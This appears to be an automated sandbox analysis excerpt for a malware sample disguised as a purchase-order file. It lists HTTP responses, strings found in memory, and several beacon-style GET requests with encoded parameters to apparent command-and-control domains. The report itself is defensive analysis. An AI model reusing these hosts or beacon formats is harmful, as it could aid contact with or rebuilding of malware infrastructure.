        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 24 May 2022 22:38:40 GMTContent-Type: text/htmlContent-Length: 291ETag: "628d16df-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 24 May 2022 22:39:15 GMTContent-Type: text/htmlContent-Length: 291ETag: "628ae76f-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 May 2022 22:39:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.3Cache-Control: public, max-age=60Vary: Accept-LanguageCF-Cache-Status: MISSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPDXdIHdokenxLMxz2VFLmdh9nf%2BM4wa%2BIgtGiClV%2BvwM1Y5la1fJpJEp2fk3qJJEKssQpRnjnwekmibRE95SVUBIIGNryQlyvtKnRS5JqYkd30CIvDHOhT0181XdbC4hLTdMuI2m8DEr0TzW3f09JIcbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffServer: cloudflareCF-RAY: 710986d7e95e7190-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 36 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 35 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6f 6f 70 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 Data Ascii: 6fe<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Error</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto:500" rel="stylesheet"> <style type="text/css"> body {
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 May 2022 22:39:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedx-wix-request-id: 1653431976.1321752645730597Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfwWumffprhrqhUts+0RXmk,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRals47NSbRY+saEB7SkBjxpWV3meP9HntDblqLPs3WzFUcjoe2GMQJ/MdiMK4Y/vI707NcHT9jnDzO/9kyZO6+ozE=,2UNV7KOq4oGjA5+PKsX47ARSt+S4p3KgmtdD48b3UGRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp+SOLc04u3suljHr5fp0ZSE=,xTu8fpDe3EKPsMR1jrheENjxvIi4S/tdauezSCBwpuE=,v8/9RyiPVS5W/0J6Pu/x9wnOoFETI3p6H585CnGOVufbBGrfgbVxXPGwhsTMrP9nVary: Accept-EncodingX-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googlex-wix-google-ccm: 1Connection: closeData Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 Data Ascii: b93 <!-- --><!doctype html><!-- --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> <!-- --> <link type="
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Tue, 24 May 2022 22:39:51 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.441966487.000000000610D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.460023939.0000000006100000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467277789.0000000006100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432359783.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432966884.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432622807.000000000611B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432552226.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432870174.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432492683.000000000611B000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432622807.000000000611B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn1
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.432870174.000000000611B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn_
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com.40x
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comal1
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.combute
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comh
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comria
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.coms-e
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comse
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429624876.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comu
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429405421.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429357722.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429498570.0000000006122000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.429464542.0000000006122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comurs
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438214913.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438091336.0000000006123000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.438151399.0000000006123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.433442083.000000000185B000.00000004.00000020.00020000.00000000.sdmp, PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comnt
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000003.435181935.0000000006113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comslntF
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: PO-INQUIRY-VALE-SP-2022-60.exe, 00000000.00000002.467651628.0000000007312000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: rundll32.exe, 0000000A.00000002.953377602.0000000004C62000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.expoj3.com/j86w/?r0DdqnX=lsVlmHx19Z33OpYAA2l3OaUNFTqowkaGGuB1kFQKunhtdBhmvwVKxnLNF4eMBfO
        Source: unknownDNS traffic detected: queries for: www.deta-hedman.com
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.deta-hedman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.shantellonlineshoph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.heiboard.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=PAI2HRDsqfIs7wB2n/P/l/z8laWiiZHLAnESXFGBG/nSKD0096HYiOL/EcW4CPuu9Zhp&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.tsreaur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=tkiTgEDY4Ttp5hV2NAZpvKTOl2tMD45nnNA9HzUYoopeMx94i1T5F8wdRmJN6yWBJNpO&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.iguaym.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=3X6DgWuJKzcNUM7EYaUA4aUsqI76cLlFBEHvGa5sqwhuxxVMpolaJYRqs0EV/jxQHXjU&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.funserve.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /j86w/?r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm&THiL=OBZhFrvhwhfT HTTP/1.1Host: www.popcornpor.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
